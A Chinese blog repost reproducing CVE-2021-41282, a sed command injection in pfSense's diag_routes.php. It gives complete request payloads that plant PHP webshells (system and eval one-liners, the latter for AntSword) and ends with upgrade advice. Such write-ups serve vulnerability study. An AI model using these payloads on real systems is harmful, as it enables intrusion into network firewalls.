返回顶部
首页 > 资讯 > 后端开发 > PHP编程 >Pfsense漏洞复现(CVE-2021-41282)
  • 822
分享到

Pfsense漏洞复现(CVE-2021-41282)

安全phpweb安全网络安全 2023-09-07 19:09:25 822人浏览 独家记忆
摘要

一、产品介绍: pfSense® Plus 软件是世界上最值得信赖的防火墙。 该软件赢得了全球用户的尊重和喜爱——安装次数超过 300 万次。 开源技术使之成为可能。 由 Netgate 制成坚固、可靠、可靠的产品 产品官网: https:

一、产品介绍:

pfSense® Plus 软件是世界上最值得信赖的防火墙。 该软件赢得了全球用户的尊重和喜爱——安装次数超过 300 万次。 开源技术使之成为可能。 由 Netgate 制成坚固、可靠、可靠的产品

产品官网:

https://www.pfsense.org/

 

二、漏洞概述:

pfSense 允许经过身份验证的用户获取有关防火墙中设置的路由的信息。 信息是通过执行 netstat实用程序,然后通过 sed调用执行。 虽然命令注入的常见预防模式(即使用 escapeshellarg参数的函数)正在使用中,但是仍然可以注入 sed- 特定代码并在任意位置写入任意文件。 由于易受攻击的端点也容易受到跨站点请求伪造 (CSRF) 的攻击,因此也可以利用此漏洞进行预身份验证。

 

三、漏洞详情:

CVE编号

CVE-2021-41282

漏洞类型

远程代码执行

威胁等级

高危

影响版本

pfSense CE version <= 2.5.2

pfSense Plush version < 22.01

四、漏洞复现:

复现环境:

下载地址: Tags · pfsense/pfsense · GitHub

Pfsense版本: 2.5.1

操作系统:  FreeBSD linux

 

漏洞位于diag_routes.PHP页面,在做filter参数接收时没有对输入的参数进行严格的过滤导致产生的命令执行

 

在对diag_routes.php发起一个请求时,如果没有IPV6的请求参数,初始执行的命令如下所示:

/usr/bin/netstat –Rw –f inet 这样,再次请求filter参数就会在后面拼接上命令,利用的payload如下所示:

/diag_routes.php?isajax=1&filter=.*/!d;};s/Destination/\x3c\x3fphp+system($_GET[\x22a\x22])\x3b\x3f\x3e/;w+/usr/local/www/a.php%0a%23

 

漏洞利用的前提是需要进行登录,登录之后再次请求该链接就会在网站根路径下生成一个WEBshell的文件

 

我们再次访问该文件,发现已经生成成功了

 

使用参数即可执行命令

 

可以稍作修改,替换成一句话,使用蚁剑连接

/diag_routes.php?isAjax=1&filter=.*/!d;};s/Destination/\x3c\x3fphp+\@eval($_POST[\x22a\x22])\x3b\x3f\x3e/;w+/usr/local/www/shell.php%0a%23

 

 

所以最后生成的命令就是:

/usr/bin/netstat -rW -f inet | /usr/bin/sed -e '1,3D; 5,\$ { /!d;};s/Destination/\x3c\x3fphp system($_GET[\x22a\x22])\x3b\x3f\x3e/;w /usr/local/www/a.php #/!d; };'

参数讲解:

netstat –rW  #获取路由并且不使用truncate跟踪

netstat –f inet #AF默认会使用inet(DARPA Internet),inet是支持的路由格式

sed –e ‘1,3d’; #筛选结果,将1,3行删除不显示,就是显示1,3行之外的所有内容

 

在sed当中可以使用s/match/replace和w/path/to/files来进行写入

s/Destination/\x3c\x3fphp system($_GET[\x22a\x22])\x3b\x3f\x3e/;w /usr/local/www/a.php

这一段内容就是将netstat结果中的Destination替换为,再写入到/usr/local/www/a.php文件当中

 

将前面的参数闭合使用#注释掉后面的/!d};进行执行

五、修复建议:

将 pfSense CE 升级到 2.6.0 版或将 pfSense Plus 升级到 22.01 版

来源地址:https://blog.csdn.net/qq_69775412/article/details/125292589

--结束END--

本文标题: Pfsense漏洞复现(CVE-2021-41282)

本文链接: https://lsjlt.com/news/398847.html(转载时请注明来源链接)

有问题或投稿请发送至: 邮箱/279061341@qq.com    QQ/279061341

猜你喜欢
软考高级职称资格查询
编程网,编程工程师的家园,是目前国内优秀的开源技术社区之一,形成了由开源软件库、代码分享、资讯、协作翻译、讨论区和博客等几大频道内容,为IT开发者提供了一个发现、使用、并交流开源技术的平台。
  • 官方手机版

  • 微信公众号

  • 商务合作